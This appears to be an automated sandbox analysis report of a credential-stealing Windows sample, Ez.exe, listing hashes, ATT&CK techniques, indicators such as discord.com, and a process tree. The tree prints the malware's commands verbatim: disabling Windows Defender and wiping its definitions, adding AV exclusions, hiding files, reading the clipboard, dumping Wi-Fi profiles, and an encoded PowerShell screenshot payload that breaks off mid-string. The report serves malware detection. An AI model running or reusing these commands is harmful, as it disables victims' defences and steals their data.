3046f37940ea9df7c118e89edd80b1903a49bced1986195d0fb9356f368479c6

Resubmissions

09-01-2025 16:52

250109-vdrc7axjhp 10

09-01-2025 16:52

09-01-2025 16:51

09-01-2025 16:51

09-01-2025 16:50

09-01-2025 16:43

Analysis

max time kernel
432s
max time network
433s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
09-01-2025 16:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ez.exe
Size

5.8MB
MD5

988710d51a3c1b137dadffb2aa1d4bbd
SHA1

dd5399d7a78b8c6c73496cfc8aee9c55ac557ec9
SHA256

3046f37940ea9df7c118e89edd80b1903a49bced1986195d0fb9356f368479c6
SHA512

9f13eb8e3d9a0f8a7941232e5183141cd4b0973ae965d53f2ea2faeae203be638c222d6bab44a66f17f2e7267de2166af47cda99c0f10bdac101ca38684439f0
SSDEEP

98304:VtIu4+Dc0dR/JamaHl3Ne4i3gDUZnhhM7M+yvFaW9cIzaF6ARwDtyDe2HEMCx43Z:4p+DXR/EeNoInY7/sHfbRy9fC5mDQTI

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
228	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3080	powershell.exe
4596	powershell.exe
2800	powershell.exe
1084	powershell.exe
1032	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Ez.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1640	cmd.exe
3424	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1308	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe
1188	Ez.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1100	tasklist.exe
116	tasklist.exe
1068	tasklist.exe
3244	tasklist.exe
2776	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4788	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0028000000046155-21.dat	upx
behavioral1/memory/1188-25-0x00007FFEFEFF0000-0x00007FFEFF45E000-memory.dmp	upx
behavioral1/files/0x0028000000046148-27.dat	upx
behavioral1/files/0x0028000000046153-29.dat	upx
behavioral1/memory/1188-30-0x00007FFF0EFD0000-0x00007FFF0EFF4000-memory.dmp	upx
behavioral1/files/0x002800000004614f-47.dat	upx
behavioral1/memory/1188-48-0x00007FFF17A20000-0x00007FFF17A2F000-memory.dmp	upx
behavioral1/files/0x002800000004614e-46.dat	upx
behavioral1/files/0x002800000004614d-45.dat	upx
behavioral1/files/0x002800000004614c-44.dat	upx
behavioral1/files/0x002800000004614b-43.dat	upx
behavioral1/files/0x002800000004614a-42.dat	upx
behavioral1/files/0x0028000000046149-41.dat	upx
behavioral1/files/0x0028000000046147-40.dat	upx
behavioral1/files/0x002900000004615a-39.dat	upx
behavioral1/files/0x0029000000046159-38.dat	upx
behavioral1/files/0x0029000000046158-37.dat	upx
behavioral1/files/0x0028000000046154-34.dat	upx
behavioral1/files/0x0028000000046152-33.dat	upx
behavioral1/memory/1188-54-0x00007FFF0E250000-0x00007FFF0E27D000-memory.dmp	upx
behavioral1/memory/1188-56-0x00007FFF0E710000-0x00007FFF0E729000-memory.dmp	upx
behavioral1/memory/1188-58-0x00007FFF0E290000-0x00007FFF0E2AF000-memory.dmp	upx
behavioral1/memory/1188-60-0x00007FFEFED20000-0x00007FFEFEE89000-memory.dmp	upx
behavioral1/memory/1188-62-0x00007FFF0DFF0000-0x00007FFF0E009000-memory.dmp	upx
behavioral1/memory/1188-64-0x00007FFF174A0000-0x00007FFF174AD000-memory.dmp	upx
behavioral1/memory/1188-66-0x00007FFF0DFC0000-0x00007FFF0DFEE000-memory.dmp	upx
behavioral1/memory/1188-72-0x00007FFEFE9A0000-0x00007FFEFED15000-memory.dmp	upx
behavioral1/memory/1188-74-0x00007FFF0EFD0000-0x00007FFF0EFF4000-memory.dmp	upx
behavioral1/memory/1188-79-0x00007FFF0DF90000-0x00007FFF0DF9D000-memory.dmp	upx
behavioral1/memory/1188-81-0x00007FFEFE880000-0x00007FFEFE998000-memory.dmp	upx
behavioral1/memory/1188-78-0x00007FFF0E250000-0x00007FFF0E27D000-memory.dmp	upx
behavioral1/memory/1188-76-0x00007FFF0DFA0000-0x00007FFF0DFB4000-memory.dmp	upx
behavioral1/memory/1188-71-0x00007FFF0DA50000-0x00007FFF0DB08000-memory.dmp	upx
behavioral1/memory/1188-70-0x00007FFEFEFF0000-0x00007FFEFF45E000-memory.dmp	upx
behavioral1/memory/1188-101-0x00007FFF0E290000-0x00007FFF0E2AF000-memory.dmp	upx
behavioral1/memory/1188-108-0x00007FFEFED20000-0x00007FFEFEE89000-memory.dmp	upx
behavioral1/memory/1188-190-0x00007FFF0DFF0000-0x00007FFF0E009000-memory.dmp	upx
behavioral1/memory/1188-280-0x00007FFF0DFC0000-0x00007FFF0DFEE000-memory.dmp	upx
behavioral1/memory/1188-285-0x00007FFF0DA50000-0x00007FFF0DB08000-memory.dmp	upx
behavioral1/memory/1188-286-0x00007FFEFE9A0000-0x00007FFEFED15000-memory.dmp	upx
behavioral1/memory/1188-318-0x00007FFEFED20000-0x00007FFEFEE89000-memory.dmp	upx
behavioral1/memory/1188-317-0x00007FFF0E290000-0x00007FFF0E2AF000-memory.dmp	upx
behavioral1/memory/1188-313-0x00007FFF0EFD0000-0x00007FFF0EFF4000-memory.dmp	upx
behavioral1/memory/1188-312-0x00007FFEFEFF0000-0x00007FFEFF45E000-memory.dmp	upx
behavioral1/memory/1188-349-0x00007FFEFE9A0000-0x00007FFEFED15000-memory.dmp	upx
behavioral1/memory/1188-352-0x00007FFEFE880000-0x00007FFEFE998000-memory.dmp	upx
behavioral1/memory/1188-363-0x00007FFF0DA50000-0x00007FFF0DB08000-memory.dmp	upx
behavioral1/memory/1188-362-0x00007FFF0DFC0000-0x00007FFF0DFEE000-memory.dmp	upx
behavioral1/memory/1188-361-0x00007FFF174A0000-0x00007FFF174AD000-memory.dmp	upx
behavioral1/memory/1188-360-0x00007FFF0DFF0000-0x00007FFF0E009000-memory.dmp	upx
behavioral1/memory/1188-359-0x00007FFEFED20000-0x00007FFEFEE89000-memory.dmp	upx
behavioral1/memory/1188-358-0x00007FFF0E290000-0x00007FFF0E2AF000-memory.dmp	upx
behavioral1/memory/1188-357-0x00007FFF0E710000-0x00007FFF0E729000-memory.dmp	upx
behavioral1/memory/1188-356-0x00007FFF0E250000-0x00007FFF0E27D000-memory.dmp	upx
behavioral1/memory/1188-355-0x00007FFF17A20000-0x00007FFF17A2F000-memory.dmp	upx
behavioral1/memory/1188-354-0x00007FFF0EFD0000-0x00007FFF0EFF4000-memory.dmp	upx
behavioral1/memory/1188-353-0x00007FFEFEFF0000-0x00007FFEFF45E000-memory.dmp	upx
behavioral1/memory/1188-351-0x00007FFF0DF90000-0x00007FFF0DF9D000-memory.dmp	upx
behavioral1/memory/1188-350-0x00007FFF0DFA0000-0x00007FFF0DFB4000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2052	cmd.exe
1896	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4620	cmd.exe
2620	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2452	WMIC.exe
1504	WMIC.exe
2772	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2968	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1896	PING.EXE

Suspicious behavior: EnumeratesProcesses 52 IoCs

pid	Process
2296	WMIC.exe
2296	WMIC.exe
2296	WMIC.exe
2296	WMIC.exe
3080	powershell.exe
2800	powershell.exe
2800	powershell.exe
3080	powershell.exe
2452	WMIC.exe
2452	WMIC.exe
2452	WMIC.exe
2452	WMIC.exe
1504	WMIC.exe
1504	WMIC.exe
1504	WMIC.exe
1504	WMIC.exe
4596	powershell.exe
4596	powershell.exe
2728	WMIC.exe
2728	WMIC.exe
2728	WMIC.exe
2728	WMIC.exe
4380	powershell.exe
4380	powershell.exe
3424	powershell.exe
3424	powershell.exe
4380	powershell.exe
3424	powershell.exe
1084	powershell.exe
1084	powershell.exe
2140	powershell.exe
2140	powershell.exe
652	WMIC.exe
652	WMIC.exe
652	WMIC.exe
652	WMIC.exe
1128	WMIC.exe
1128	WMIC.exe
1128	WMIC.exe
1128	WMIC.exe
4844	WMIC.exe
4844	WMIC.exe
4844	WMIC.exe
4844	WMIC.exe
1032	powershell.exe
1032	powershell.exe
2772	WMIC.exe
2772	WMIC.exe
2772	WMIC.exe
2772	WMIC.exe
4884	powershell.exe
4884	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2296	WMIC.exe
Token: SeSecurityPrivilege	2296	WMIC.exe
Token: SeTakeOwnershipPrivilege	2296	WMIC.exe
Token: SeLoadDriverPrivilege	2296	WMIC.exe
Token: SeSystemProfilePrivilege	2296	WMIC.exe
Token: SeSystemtimePrivilege	2296	WMIC.exe
Token: SeProfSingleProcessPrivilege	2296	WMIC.exe
Token: SeIncBasePriorityPrivilege	2296	WMIC.exe
Token: SeCreatePagefilePrivilege	2296	WMIC.exe
Token: SeBackupPrivilege	2296	WMIC.exe
Token: SeRestorePrivilege	2296	WMIC.exe
Token: SeShutdownPrivilege	2296	WMIC.exe
Token: SeDebugPrivilege	2296	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2296	WMIC.exe
Token: SeRemoteShutdownPrivilege	2296	WMIC.exe
Token: SeUndockPrivilege	2296	WMIC.exe
Token: SeManageVolumePrivilege	2296	WMIC.exe
Token: 33	2296	WMIC.exe
Token: 34	2296	WMIC.exe
Token: 35	2296	WMIC.exe
Token: 36	2296	WMIC.exe
Token: SeDebugPrivilege	2776	tasklist.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeIncreaseQuotaPrivilege	2296	WMIC.exe
Token: SeSecurityPrivilege	2296	WMIC.exe
Token: SeTakeOwnershipPrivilege	2296	WMIC.exe
Token: SeLoadDriverPrivilege	2296	WMIC.exe
Token: SeSystemProfilePrivilege	2296	WMIC.exe
Token: SeSystemtimePrivilege	2296	WMIC.exe
Token: SeProfSingleProcessPrivilege	2296	WMIC.exe
Token: SeIncBasePriorityPrivilege	2296	WMIC.exe
Token: SeCreatePagefilePrivilege	2296	WMIC.exe
Token: SeBackupPrivilege	2296	WMIC.exe
Token: SeRestorePrivilege	2296	WMIC.exe
Token: SeShutdownPrivilege	2296	WMIC.exe
Token: SeDebugPrivilege	2296	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2296	WMIC.exe
Token: SeRemoteShutdownPrivilege	2296	WMIC.exe
Token: SeUndockPrivilege	2296	WMIC.exe
Token: SeManageVolumePrivilege	2296	WMIC.exe
Token: 33	2296	WMIC.exe
Token: 34	2296	WMIC.exe
Token: 35	2296	WMIC.exe
Token: 36	2296	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2800	powershell.exe
Token: SeSecurityPrivilege	2800	powershell.exe
Token: SeTakeOwnershipPrivilege	2800	powershell.exe
Token: SeLoadDriverPrivilege	2800	powershell.exe
Token: SeSystemProfilePrivilege	2800	powershell.exe
Token: SeSystemtimePrivilege	2800	powershell.exe
Token: SeProfSingleProcessPrivilege	2800	powershell.exe
Token: SeIncBasePriorityPrivilege	2800	powershell.exe
Token: SeCreatePagefilePrivilege	2800	powershell.exe
Token: SeBackupPrivilege	2800	powershell.exe
Token: SeRestorePrivilege	2800	powershell.exe
Token: SeShutdownPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeSystemEnvironmentPrivilege	2800	powershell.exe
Token: SeRemoteShutdownPrivilege	2800	powershell.exe
Token: SeUndockPrivilege	2800	powershell.exe
Token: SeManageVolumePrivilege	2800	powershell.exe
Token: 33	2800	powershell.exe
Token: 34	2800	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 412 wrote to memory of 1188	412	Ez.exe	81
PID 412 wrote to memory of 1188	412	Ez.exe	81
PID 1188 wrote to memory of 4736	1188	Ez.exe	83
PID 1188 wrote to memory of 4736	1188	Ez.exe	83
PID 1188 wrote to memory of 4852	1188	Ez.exe	84
PID 1188 wrote to memory of 4852	1188	Ez.exe	84
PID 1188 wrote to memory of 5016	1188	Ez.exe	87
PID 1188 wrote to memory of 5016	1188	Ez.exe	87
PID 1188 wrote to memory of 4688	1188	Ez.exe	89
PID 1188 wrote to memory of 4688	1188	Ez.exe	89
PID 4736 wrote to memory of 3080	4736	cmd.exe	91
PID 4736 wrote to memory of 3080	4736	cmd.exe	91
PID 4688 wrote to memory of 2296	4688	cmd.exe	92
PID 4688 wrote to memory of 2296	4688	cmd.exe	92
PID 5016 wrote to memory of 2776	5016	cmd.exe	93
PID 5016 wrote to memory of 2776	5016	cmd.exe	93
PID 4852 wrote to memory of 2800	4852	cmd.exe	94
PID 4852 wrote to memory of 2800	4852	cmd.exe	94
PID 1188 wrote to memory of 3640	1188	Ez.exe	97
PID 1188 wrote to memory of 3640	1188	Ez.exe	97
PID 3640 wrote to memory of 2260	3640	cmd.exe	99
PID 3640 wrote to memory of 2260	3640	cmd.exe	99
PID 1188 wrote to memory of 3084	1188	Ez.exe	100
PID 1188 wrote to memory of 3084	1188	Ez.exe	100
PID 3084 wrote to memory of 1512	3084	cmd.exe	102
PID 3084 wrote to memory of 1512	3084	cmd.exe	102
PID 1188 wrote to memory of 1788	1188	Ez.exe	103
PID 1188 wrote to memory of 1788	1188	Ez.exe	103
PID 4852 wrote to memory of 228	4852	cmd.exe	146
PID 4852 wrote to memory of 228	4852	cmd.exe	146
PID 1788 wrote to memory of 2452	1788	cmd.exe	106
PID 1788 wrote to memory of 2452	1788	cmd.exe	106
PID 1188 wrote to memory of 3636	1188	Ez.exe	171
PID 1188 wrote to memory of 3636	1188	Ez.exe	171
PID 3636 wrote to memory of 1504	3636	cmd.exe	109
PID 3636 wrote to memory of 1504	3636	cmd.exe	109
PID 1188 wrote to memory of 4788	1188	Ez.exe	150
PID 1188 wrote to memory of 4788	1188	Ez.exe	150
PID 1188 wrote to memory of 2160	1188	Ez.exe	111
PID 1188 wrote to memory of 2160	1188	Ez.exe	111
PID 2160 wrote to memory of 4596	2160	cmd.exe	114
PID 2160 wrote to memory of 4596	2160	cmd.exe	114
PID 4788 wrote to memory of 3816	4788	cmd.exe	115
PID 4788 wrote to memory of 3816	4788	cmd.exe	115
PID 1188 wrote to memory of 4520	1188	Ez.exe	116
PID 1188 wrote to memory of 4520	1188	Ez.exe	116
PID 1188 wrote to memory of 692	1188	Ez.exe	117
PID 1188 wrote to memory of 692	1188	Ez.exe	117
PID 4520 wrote to memory of 116	4520	cmd.exe	120
PID 4520 wrote to memory of 116	4520	cmd.exe	120
PID 692 wrote to memory of 1100	692	cmd.exe	121
PID 692 wrote to memory of 1100	692	cmd.exe	121
PID 1188 wrote to memory of 332	1188	Ez.exe	122
PID 1188 wrote to memory of 332	1188	Ez.exe	122
PID 1188 wrote to memory of 1640	1188	Ez.exe	124
PID 1188 wrote to memory of 1640	1188	Ez.exe	124
PID 1188 wrote to memory of 4924	1188	Ez.exe	125
PID 1188 wrote to memory of 4924	1188	Ez.exe	125
PID 1188 wrote to memory of 1156	1188	Ez.exe	127
PID 1188 wrote to memory of 1156	1188	Ez.exe	127
PID 1188 wrote to memory of 4620	1188	Ez.exe	130
PID 1188 wrote to memory of 4620	1188	Ez.exe	130
PID 1188 wrote to memory of 1304	1188	Ez.exe	131
PID 1188 wrote to memory of 1304	1188	Ez.exe	131

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3512	attrib.exe
3816	attrib.exe
4788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ez.exe
"C:\Users\Admin\AppData\Local\Temp\Ez.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:412
- C:\Users\Admin\AppData\Local\Temp\Ez.exe
  "C:\Users\Admin\AppData\Local\Temp\Ez.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ez.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Ez.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2800
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3084
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1504
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ez.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:4788
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Ez.exe"
      4⤵
      Views/modifies file attributes
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ ‏.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:692
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:332
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1640
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4924
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1156
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4620
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1304
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3340
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBp